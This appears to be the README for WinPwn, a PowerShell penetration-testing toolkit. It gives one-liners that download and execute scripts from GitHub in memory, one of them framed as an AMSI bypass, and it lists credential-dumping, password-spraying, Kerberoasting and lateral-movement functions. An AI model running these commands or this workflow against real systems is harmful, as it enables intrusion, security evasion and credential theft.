In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. I often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. They are loaded into RAM via IEX Downloadstring.
Any suggestions, feedback, Pull requests and comments are welcome!
Just Import the Modules with:
Import-Module .\WinPwn.ps1
or iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
For AMSI Bypass use the following oneliner:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')
If you find yourself stuck on a windows system with no internet access - no problem at all, just use Offline_Winpwn.ps1, all scripts and executables are included.
Functions available after Import:
WinPwn
-> Menu to choose attacks:
Inveigh
-> Executes Inveigh in a new Console window , SMB-Relay attacks with Session management (Invoke-TheHash) integratedsessionGopher
-> Executes Sessiongopher Asking you for parameterskittielocal
->- Obfuscated Invoke-Mimikatz version
- Safetykatz in memory
- Dump lsass using rundll32 technique
- Download and run Lazagne
- Dump Browser credentials
- Extract juicy informations from memory
- Exfiltrate Wifi-Credentials
- Dump SAM-File NTLM Hashes
localreconmodules
->- Collect installed software, vulnerable software, Shares, network information, groups, privileges and many more
- Check typical vulns like SMB-Signing, LLMNR Poisoning, MITM6 , WSUS over HTTP
- Checks the Powershell event logs for credentials or other sensitive informations
- Search for passwords in the registry and on the file system
- Find sensitive files (config files, RDP files, keepass Databases)
- Search for .NET Binaries on the local system
- Optional: Get-Computerdetails (Powersploit) and PSRecon
domainreconmodules
->- Collect various domain informations for manual review
- Find AD-Passwords in description fields
- Search for potential sensitive domain share files
- ACLAnalysis
- Unconstrained delegation systems/users are enumerated
- MS17-10 Scanner for domain systems
- SQL Server discovery and Auditing functions (default credentials, passwords in the database and more)
- MS-RPRN Check for Domaincontrollers
- Group Policy Audit with Grouper2
- An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon.
Privescmodules
-> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords)latmov
-> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systemsshareenumeration
-> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit)groupsearch
-> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit)Kerberoasting
-> Executes Invoke-Kerberoast in a new window and stores the hashes for later crackingpowerSQL
-> SQL Server discovery, Check access with current user, Audit for default credentials + UNCPath Injection AttacksSharphound
-> Downloads Sharphound and collects Information for the Bloodhound DBadidnswildcard
-> Create a Active Directory-Integrated DNS Wildcard RecordMS17-10
-> Scan active windows Servers in the domain or all systems for MS17-10 (Eternalblue) vulnerabilitySharpcradle
-> Load C# Files from a remote Webserver to RAMDomainPassSpray
-> DomainPasswordSpray Attacks, one password for all domain users
TO-DO
- Some obfuskation
- More obfuscation
- Proxy via PAC-File support
- Get the scripts from my own creds repository (https://github.com/S3cur3Th1sSh1t/Creds) to be independent from changes in the original repositories
- More Recon/Exploitation functions
- Add MS17-10 Scanner
- Add menu for better handling of functions
- Amsi Bypass
- Mailsniper integration
- Azure Checks / Modules integration
CREDITS
- Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash
- Arvanaghi - SessionGopher
- PowerShellMafia - Powersploit
- Dionach - PassHunt
- A-mIn3 - WINSpect
- 411Hall - JAWS
- sense-of-security - ADrecon
- dafthack - DomainPasswordSpray
- rasta-mouse - Sherlock
- AlessandroZ - LaZagne
- samratashok - nishang
- leechristensen - Random Repo
- HarmJ0y - Many good Blogposts, Gists and Scripts
- NETSPI - PowerUpSQL
- Cn33liz - p0wnedShell
- rasta-mouse - AmsiScanBufferBypass
- l0ss - Grouper2
- dafthack - DomainPasswordSpray
- enjoiz - PrivEsc